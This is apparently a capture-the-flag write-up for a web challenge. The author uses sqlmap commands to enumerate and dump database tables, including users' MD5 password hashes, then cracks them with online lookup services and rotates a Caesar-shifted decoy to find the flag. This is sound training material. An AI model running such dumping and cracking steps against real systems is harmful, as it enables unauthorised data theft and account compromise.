Category: Web

Points: 200


Yes, that is gramatically correct. Now who doesn't love a good book and an even better villain?

With Love,

Joker xx

"Hint: 200: Flags aren't in plaintext"


I kind of cheated here, I normally wouldn’t resort to running sqlmap immediately. But in the end, I used it to dumb tables.

$ sqlmap -u "" --dbs
$ sqlmap -u "" --tables
$ sqlmap -u "" -D CCNs -T basic
$ sqlmap -u "" -D CCNs -T secrets

I used this to dump tables, I also dumped the rest of the tables but nothing looked especially interesting.

	| id | name         | gender |
	| 1  | Harley Quinn | Female |
	| 2  | Riddler      | ?      |
	| 3  | Joker        | HAHAHA |
	| 5  | Two-Face     | Male   |
	| id | User    | Password                         |
	| 1  | Admin   | 3118dd54268acb0f04a048fd090e14f7 |
	| 2  | Guy     | c9846fa3e401252cf822a21ecf6a567e |
	| 3  | Joker   | c417fccfc5d5a288243c96359c62c381 |
	| 4  | Colonel | adac9d4711cd21cc4cec1b0f8e7ca538 |

Looking at the flag.welcome table, the flag claims to be pcbfcppgle. I also happen to be told in the hint that “flags aren’t in plaintext” so let’s rotate that flag.

Using my favorite caesar cipher tool we put that in and choose “Guess” for the key, and it finds that with a key of 2 the flag translates to redherring. How annoying.

Looking at the CCNs.secrets table, we see some hashes. Let’s try to crack ( those.

3118dd54268acb0f04a048fd090e14f7 -> NiceTry

Again, how annoying.

Two hours later...

Let’s see if any online databases have the other hashes.

Crackstation? Nope.

Hashkiller? Nope. Yup.

3118dd54268acb0f04a048fd090e14f7 -> NiceTry
c9846fa3e401252cf822a21ecf6a567e -> InfectiousLaughter
c417fccfc5d5a288243c96359c62c381 -> RC3-2016-HAHAHAHA
adac9d4711cd21cc4cec1b0f8e7ca538 -> TheRealSanders
